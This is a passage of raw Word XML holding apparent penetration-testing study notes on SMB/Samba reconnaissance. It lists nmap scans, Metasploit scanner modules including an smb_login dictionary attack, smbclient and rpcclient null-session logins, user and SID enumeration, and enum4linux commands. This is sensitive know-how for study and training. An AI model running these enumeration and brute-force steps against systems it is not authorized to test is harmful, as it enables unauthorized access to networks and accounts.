    <w:p w14:paraId="55B7BC94" w14:textId="6AC70C05" w:rsidR="00D734CA" w:rsidRPr="002A77BD" w:rsidRDefault="00D734CA" w:rsidP="00D734CA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Can download files and exfil different files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380139F1" w14:textId="77777777" w:rsidR="00D734CA" w:rsidRPr="002A77BD" w:rsidRDefault="00D734CA" w:rsidP="00D734CA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F102AFD" w14:textId="77777777" w:rsidR="00D734CA" w:rsidRPr="002A77BD" w:rsidRDefault="00D734CA" w:rsidP="00D734CA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A42F655" w14:textId="4FD5801F" w:rsidR="00D734CA" w:rsidRPr="002A77BD" w:rsidRDefault="00D734CA" w:rsidP="00D734CA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Linux Utilization of SMB</w:t>
      </w:r>
      <w:r w:rsidR="00956D27" w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Samba Recon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1ECF4F" w14:textId="291E7FEC" w:rsidR="00956D27" w:rsidRPr="002A77BD" w:rsidRDefault="00956D27" w:rsidP="00956D27">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Can utilize -sC, -sV, or -O in an NMAP scan to enumerate OS or version </w:t>
      </w:r>
      <w:r w:rsidR="00DE290F" w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>specifics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232D0899" w14:textId="64611136" w:rsidR="00DE290F" w:rsidRPr="002A77BD" w:rsidRDefault="00DE290F" w:rsidP="00DE290F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“nmap (HOST) -sU –top-port 25 –open -sV”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38542861" w14:textId="1D02414D" w:rsidR="00DE290F" w:rsidRPr="002A77BD" w:rsidRDefault="00DE290F" w:rsidP="00DE290F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Host enumeration on an NMAP scan, can display host discovery and version info.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E77230" w14:textId="77777777" w:rsidR="00DE290F" w:rsidRPr="002A77BD" w:rsidRDefault="00DE290F" w:rsidP="00DE290F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DB363FD" w14:textId="7FD7D66C" w:rsidR="00DE290F" w:rsidRPr="002A77BD" w:rsidRDefault="009E06EE" w:rsidP="00DE290F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>MSFConsole (Metasploit Framework Console)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1299FD32" w14:textId="29157FE4" w:rsidR="009E06EE" w:rsidRPr="002A77BD" w:rsidRDefault="009E06EE" w:rsidP="009E06EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“auxiliary/scanner/smb/smb_version”</w:t>
      </w:r>
      <w:r w:rsidR="00D30699" w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Enumerate SMB version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C2CEA8" w14:textId="770C582C" w:rsidR="00D30699" w:rsidRPr="002A77BD" w:rsidRDefault="00D30699" w:rsidP="009E06EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“auxiliary/scanner/smb/sm2”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9B6C4F" w14:textId="1D2F6A19" w:rsidR="00E061A0" w:rsidRPr="002A77BD" w:rsidRDefault="00E061A0" w:rsidP="00E061A0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Enumerate if this host supports SMB2 for exploits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68098783" w14:textId="2A13F0F3" w:rsidR="002B6B79" w:rsidRPr="002A77BD" w:rsidRDefault="002B6B79" w:rsidP="002B6B79">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“auxiliary/scanner/smb/smb_enumshares</w:t>
      </w:r>
      <w:r w:rsidR="00335A2B" w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CB7A01" w14:textId="14086183" w:rsidR="002B6B79" w:rsidRPr="002A77BD" w:rsidRDefault="002B6B79" w:rsidP="002B6B79">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Enumerates SMB shares through MSFConsole (might need to specify user/pass)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBA8EA7" w14:textId="6B8C2651" w:rsidR="00335A2B" w:rsidRPr="002A77BD" w:rsidRDefault="00335A2B" w:rsidP="00335A2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“auxiliary/scanner/smb/smb_login”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB0598F" w14:textId="60654AA0" w:rsidR="00335A2B" w:rsidRPr="002A77BD" w:rsidRDefault="00335A2B" w:rsidP="00335A2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Dictionary attack, utilize a pass file and a previously enumerated user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE0427E" w14:textId="105CAF3E" w:rsidR="00335A2B" w:rsidRPr="002A77BD" w:rsidRDefault="00335A2B" w:rsidP="00335A2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Could also utilize hydra for this dictionary attack for the same result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298EF1B9" w14:textId="45D88687" w:rsidR="007E515A" w:rsidRPr="002A77BD" w:rsidRDefault="007E515A" w:rsidP="007E515A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“auxiliary/scanner/smb/pipe_auditor” – View if other services are piped to SMB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9BAF78" w14:textId="768321FF" w:rsidR="007E515A" w:rsidRPr="002A77BD" w:rsidRDefault="007E515A" w:rsidP="007E515A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>PIVOTING!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E47A39C" w14:textId="77777777" w:rsidR="009E06EE" w:rsidRPr="002A77BD" w:rsidRDefault="009E06EE" w:rsidP="009E06EE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64A22BB5" w14:textId="15B063B5" w:rsidR="009E06EE" w:rsidRPr="002A77BD" w:rsidRDefault="009E06EE" w:rsidP="009E06EE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Nmblookup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245E53B8" w14:textId="0DBEC860" w:rsidR="009E06EE" w:rsidRPr="002A77BD" w:rsidRDefault="009E06EE" w:rsidP="009E06EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“nmblookup -A (HOST)”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557A566F" w14:textId="39C9F2BA" w:rsidR="009E06EE" w:rsidRPr="002A77BD" w:rsidRDefault="009E06EE" w:rsidP="009E06EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Utilizes the netbios protocol to connect to the Samba shares.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752712A2" w14:textId="77777777" w:rsidR="009E06EE" w:rsidRPr="002A77BD" w:rsidRDefault="009E06EE" w:rsidP="009E06EE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F23F9FA" w14:textId="34DE6496" w:rsidR="009E06EE" w:rsidRPr="002A77BD" w:rsidRDefault="009E06EE" w:rsidP="009E06EE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>SMBClient</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0444D1A4" w14:textId="228C4868" w:rsidR="009E06EE" w:rsidRPr="002A77BD" w:rsidRDefault="009E06EE" w:rsidP="009E06EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“smbclient -L (LIST) (HOST) -N (Check for Null session)”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BEBAD13" w14:textId="23691D17" w:rsidR="002B6B79" w:rsidRPr="002A77BD" w:rsidRDefault="002B6B79" w:rsidP="009E06EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“smbclient //(HOST)/(SHARES) -N (Log in to share with Null user)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15034EAA" w14:textId="6A430535" w:rsidR="009E06EE" w:rsidRPr="002A77BD" w:rsidRDefault="009E06EE" w:rsidP="009E06EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>KEEP LOOKING FOR IPC SHARES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCE76A8" w14:textId="0F4B2794" w:rsidR="002B6B79" w:rsidRPr="002A77BD" w:rsidRDefault="00D30699" w:rsidP="002B6B79">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“nmap (HOST) -p 445 –script smb-protocols” (in NMAP section)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC1F75B" w14:textId="77777777" w:rsidR="009E06EE" w:rsidRPr="002A77BD" w:rsidRDefault="009E06EE" w:rsidP="009E06EE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D2872C7" w14:textId="7EE92674" w:rsidR="009E06EE" w:rsidRPr="002A77BD" w:rsidRDefault="009E06EE" w:rsidP="009E06EE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>RPCClient</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18480C3B" w14:textId="3F400CD2" w:rsidR="009E06EE" w:rsidRPr="002A77BD" w:rsidRDefault="009E06EE" w:rsidP="009E06EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“rpcclient -U “” -N (no pass) (HOST)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72693195" w14:textId="5C5A6448" w:rsidR="009E06EE" w:rsidRPr="002A77BD" w:rsidRDefault="009E06EE" w:rsidP="009E06EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Should open a session that you are connected to with RPCClient</w:t>
      </w:r>
      <w:r w:rsidR="007E515A" w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> using a null user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222C3EB1" w14:textId="497797E9" w:rsidR="00D30699" w:rsidRPr="002A77BD" w:rsidRDefault="00D30699" w:rsidP="00D30699">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>&gt; “srvinfo” – Lists server info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CE8C31" w14:textId="7A7E1DCD" w:rsidR="00E061A0" w:rsidRPr="002A77BD" w:rsidRDefault="00E061A0" w:rsidP="00D30699">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>&gt; enumdomusers – Enumerates domain users, can view RIDs</w:t>
      </w:r>
      <w:r w:rsidR="002B6B79" w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> for users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5E5764" w14:textId="16660556" w:rsidR="002B6B79" w:rsidRPr="002A77BD" w:rsidRDefault="002B6B79" w:rsidP="00D30699">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>&gt; enumdomgroups – Enumerate groups, can view RIDs for groups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCFAB0E" w14:textId="26575CF4" w:rsidR="002B6B79" w:rsidRPr="002A77BD" w:rsidRDefault="00E061A0" w:rsidP="002B6B79">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>&gt; lookupnames (USER) – SID for specified user, can specify admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00CDE2DC" w14:textId="77777777" w:rsidR="009E06EE" w:rsidRPr="002A77BD" w:rsidRDefault="009E06EE" w:rsidP="009E06EE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52C740C7" w14:textId="77777777" w:rsidR="007E515A" w:rsidRPr="002A77BD" w:rsidRDefault="007E515A" w:rsidP="009E06EE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6ED8A546" w14:textId="0A542970" w:rsidR="009E06EE" w:rsidRPr="002A77BD" w:rsidRDefault="00D30699" w:rsidP="009E06EE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Enum4Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F4E0A8" w14:textId="696883D8" w:rsidR="00D30699" w:rsidRPr="002A77BD" w:rsidRDefault="00D30699" w:rsidP="00D30699">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“enum4linux -o (HOST)”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0EAAB0" w14:textId="2386AB0B" w:rsidR="00D30699" w:rsidRPr="002A77BD" w:rsidRDefault="00D30699" w:rsidP="00D30699">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Should display relevant information regarding enumerating the host, for example OS version, server type, platform ID, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F706859" w14:textId="25A3D7D1" w:rsidR="00E061A0" w:rsidRPr="002A77BD" w:rsidRDefault="00E061A0" w:rsidP="00D30699">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“enum4linux -U (HOST)”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6927A6" w14:textId="6CD54973" w:rsidR="002B6B79" w:rsidRPr="002A77BD" w:rsidRDefault="002B6B79" w:rsidP="00D30699">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“enum4linux -S (HOST)” – Enumerate shares</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDB9681" w14:textId="109242D9" w:rsidR="002B6B79" w:rsidRPr="002A77BD" w:rsidRDefault="002B6B79" w:rsidP="00D30699">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
